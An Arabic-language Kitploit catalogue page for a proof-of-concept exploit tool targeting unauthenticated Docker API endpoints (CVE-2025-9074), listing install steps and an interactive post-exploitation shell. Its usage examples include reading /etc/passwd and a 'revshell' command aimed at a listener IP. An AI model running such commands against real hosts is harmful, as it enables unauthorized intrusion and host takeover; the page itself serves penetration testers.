Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
poc-2025-9074 — Docker API CVE-2025-9074 PoC (إثبات المفهوم). إطار استغلال متطور لـ CVE-2025-9074، يستهدف نقاط نهاية Docker API غير الموثَّقة مع قشرة أوامر تفاعلية مدمجة. | Kitploit
أدوات/GitHubGitHub/xwpdx0/poc-2025-9074
أمن البنية التحتية السحابيةتصعيد الامتيازاتماسحات الثغرات الأمنيةأمن الحاوياتأطر الاستغلالالاستغلالما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubxwpdx0/poc-2025-9074
41منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

poc-2025-9074

Docker API CVE-2025-9074 PoC (إثبات المفهوم). إطار استغلال متطور لـ CVE-2025-9074، يستهدف نقاط نهاية Docker API غير الموثَّقة مع قشرة أوامر تفاعلية مدمجة.

عرض المستودع

CVE-2025-9074 | Docker API CVE-2025-9074 PoC (إثبات المفهوم)

إطار عمل متطور لاستغلال CVE-2025-9074، يستهدف نقاط نهاية Docker API غير الموثّقة مع صدفة أوامر تفاعلية مدمجة.

Language Platform License

نظرة عامة

تعمل هذه الأداة على أتمتة استغلال مثيلات Docker API المكشوفة دون مصادقة، مما يتيح إنشاء حاويات كاملة وتنفيذ الأوامر على الجهاز المستهدف. تتميز الأداة بصدفة تفاعلية مخصصة لعمليات ما بعد الاستغلال بسلاسة.

ملاحظة: هذا تنفيذ PoC مخصص. لم أكتشف CVE-2025-9074.

العرض التوضيحي

الاستغلال الأولي

عملية الاستغلال

اكتشاف تلقائي للثغرات، سحب الصور، إنشاء الحاويات وتهيئتها

تنفيذ الأوامر التفاعلي

تنفيذ الأوامر

صدفة ما بعد الاستغلال مع إمكانية تنفيذ الأوامر

القدرات الرئيسية

  • فحص تلقائي لثغرات Docker API
  • نشر حاويات مع تثبيت نظام ملفات المضيف
  • صدفة تفاعلية لما بعد الاستغلال
  • واجهة تنفيذ أوامر عن بُعد
  • وحدة نشر قشرة عكسية
  • مخرجات طرفية ملونة لتحسين الرؤية

التثبيت

  1. استنساخ المستودع
root@kitploit:~
git clone https://github.com/xwpdx0/poc-2025-9074
  1. ترجمة الكود
root@kitploit:~
gcc poc.c -o poc-2025-9074

أو يمكنك تنزيل الملف التنفيذي من Releases

الاستخدام

root@kitploit:~
./poc-2025-9074

الهدف الافتراضي

التنفيذ ضد الهدف الافتراضي (127.0.0.1:2375):

root@kitploit:~
./poc-2025-9074

هدف مخصص

تحديد نقطة نهاية Docker API مخصصة:

هدف مخصص

الصدفة التفاعلية

بعد الاستغلال الناجح، توفّر صدفة تفاعلية الأوامر التالية:

CommandDescription
cmd <command>تنفيذ أوامر عشوائية داخل الحاوية
revshell <ip> <port>نشر قشرة عكسية إلى المستمع المحدد

أمثلة الاستخدام

root@kitploit:~
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info

تفاصيل الثغرة

تؤثر CVE-2025-9074 على مثيلات Docker التي تحتوي على نقاط نهاية API مكشوفة تفتقر إلى آليات مصادقة مناسبة. يسمح هذا التكوين الخاطئ بالوصول غير المصرح به إلى Docker daemon، مما يتيح:

  • إنشاء حاويات عشوائية
  • الوصول إلى نظام ملفات المضيف عبر bind mounts
  • فرص تصعيد الصلاحيات
  • تنفيذ التعليمات البرمجية عن بُعد

إخلاء المسؤولية القانوني

هذه الأداة مقدمة لأغراض تعليمية واختبارات أمنية مصرح بها فقط.

  • استخدمها فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني ويعاقب عليه القانون
  • لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام أو الأضرار الناجمة عن هذه الأداة
  • المستخدمون وحدهم مسؤولون عن الامتثال للقوانين واللوائح المعمول بها

المؤلف

xwpd (@xwpdx0)

الرخصة

رخصة MIT - راجع ملف LICENSE للتفاصيل


لأغراض الإفصاح المسؤول والبحث الأمني فقط.

تنزيل الأداة
infoعرض معلومات الحاوية والهدف الحالية
exitإنهاء الجلسة التفاعلية